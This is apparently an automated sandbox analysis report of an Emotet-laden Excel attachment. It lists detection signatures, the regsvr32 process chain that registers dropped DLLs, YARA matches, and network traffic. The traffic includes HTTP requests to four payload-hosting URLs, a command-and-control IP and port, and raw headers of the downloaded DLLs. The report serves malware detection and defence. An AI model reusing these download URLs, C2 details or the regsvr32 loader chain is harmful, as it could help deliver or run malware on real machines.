Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
allegati_23052022.xls

Overview

General Information

Sample Name:allegati_23052022.xls
Analysis ID:632542
MD5:045b8e2ecf49c8e90db6711efe0f1cc1
SHA1:a2d6a1b1ff6f65555084251f2889a07f4c6af963
SHA256:6b606a36d7de856b6f0bc3bc896ac6352fbdd57e0eca567e33e6ce360a3e6d33
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2372 cmdline: C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1200 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1472 cmdline: C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1464 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2428 cmdline: C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1112 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IyXmToN\lzIgCVr.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2836 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
allegati_23052022.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0xb2aa:$s1: Excel
  • 0xc33e:$s1: Excel
  • 0x34ca:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\allegati_23052022.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0xb2aa:$s1: Excel
  • 0xc33e:$s1: Excel
  • 0x34ca:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1245962917.00000000001C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.1247080526.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.948473026.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.947931348.00000000001C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000002.1246205608.00000000003C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.regsvr32.exe.140000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.regsvr32.exe.140000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                8.2.regsvr32.exe.1c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  10.2.regsvr32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    3.2.regsvr32.exe.140000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 11 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://ocalogullari.com/inc/Wcm82enrs8/Avira URL Cloud: Label: malware
                      Source: https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/Avira URL Cloud: Label: malware
                      Source: https://myphamcuatui.com/assets/OPVeVSpO/Avira URL Cloud: Label: malware
                      Source: http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: newkano.comVirustotal: Detection: 8%Perma Link
                      Source: ocalogullari.comVirustotal: Detection: 8%Perma Link
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 103.45.230.202:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.1.238.211:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003036C GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,3_2_1003036C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10030FE0 lstrlenW,FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,3_2_10030FE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1003036C GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,4_2_1003036C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10030FE0 lstrlenW,FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,4_2_10030FE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: LeBuXD3cUkeiPrfy[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: newkano.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, 77777777h3_2_10002200
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004F04C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004F08C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004F0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004F10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004F1B1
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdx]3_2_10047500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8, rdi3_2_1003D560
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, r10d3_2_1004F8A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]3_2_100398D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rbx, qword ptr [rsp+70h]3_2_10048AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov word ptr [rdi], 0000h3_2_10001B20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EBF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004ECE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004ED79
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rcx, qword ptr [r12+10h]3_2_10039DD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EE1D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EE78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi3_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx3_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]3_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp rcx, r83_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EF1E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EFB9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h3_2_1004EFDE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, 77777777h4_2_10002200
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004F04C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004F08C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004F0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004F10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004F1B1
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdx]4_2_10047500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8, rdi4_2_1003D560
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, r10d4_2_1004F8A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]4_2_100398D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rbx, qword ptr [rsp+70h]4_2_10048AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov word ptr [rdi], 0000h4_2_10001B20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EBF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004ECE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004ED79
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rcx, qword ptr [r12+10h]4_2_10039DD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EE1D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EE78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi4_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx4_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]4_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp rcx, r84_2_1004DE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EF1E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EFB9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h4_2_1004EFDE
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.45.230.202:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.45.230.202:443

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewIP Address: 165.22.73.229 165.22.73.229
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 23 May 2022 16:59:09 GMTContent-Type: application/x-msdownloadContent-Length: 850432Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 16:59:09 GMTContent-Disposition: attachment; filename="QqHRFPCw2sMluT.dll"Content-Transfer-Encoding: binarySet-Cookie: 628bbd5d143a6=1653325149; expires=Mon, 23-May-2022 17:00:09 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 16:59:09 GMTX-Powered-By: PleskLinData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a7 6f 8b 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 2c 05 00 00 ca 07 00 00 00 00 00 00 95 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 0d 00 00 04 00 00 b3 21 0d 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 dd 06 00 50 00 00 00 e8 b6 06 00 f0 00 00 00 00 e0 07 00 94 64 05 00 00 80 07 00 50 5e 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 00 0c 00 00 48 b6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 2b 05 00 00 10 00 00 00 2c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 9d 01 00 00 40 05 00 00 9e 01 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 94 00 00 00 e0 06 00 00 34 00 00 00 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 50 5e 00 00 00 80 07 00 00 60 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 64 05 00 00 e0 07 00 00 66 05 00 00 62 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 30 00 00 00 50 0d 00 00 32 00 00 00 c8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/5.6.40set-cookie: 628bbd675e0bb=1653325159; expires=Mon, 23-May-2022 17:00:19 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 16:59:19 GMTexpires: Mon, 23 May 2022 16:59:19 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="4bP.dll"content-transfer-encoding: binarycontent-length: 850432date: Mon, 23 May 2022 16:59:19 GMTserver: LiteSpeedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a7 6f 8b 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 2c 05 00 00 ca 07 00 00 00 00 00 00 95 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 0d 00 00 04 00 00 b3 21 0d 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 dd 06 00 50 00 00 00 e8 b6 06 00 f0 00 00 00 00 e0 07 00 94 64 05 00 00 80 07 00 50 5e 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 00 0c 00 00 48 b6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 2b 05 00 00 10 00 00 00 2c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 9d 01 00 00 40 05 00 00 9e 01 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 94 00 00 00 e0 06 00 00 34 00 00 00 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 50 5e 00 00 00 80 07 00 00 60 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 64 05 00 00 e0 07 00 00 66 05 00 00 62 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 30 00 00 00 50 0d 00 00 32 00 00 00 c8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                      Source: global trafficHTTP traffic detected: GET /wp-admin/66rIsrVwoPKUsjcAs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newkano.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /assets/OPVeVSpO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myphamcuatui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /inc/Wcm82enrs8/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ocalogullari.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /old_source/9boJQZpTSdQE/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sieuthiphutungxenang.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 165.22.73.229:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
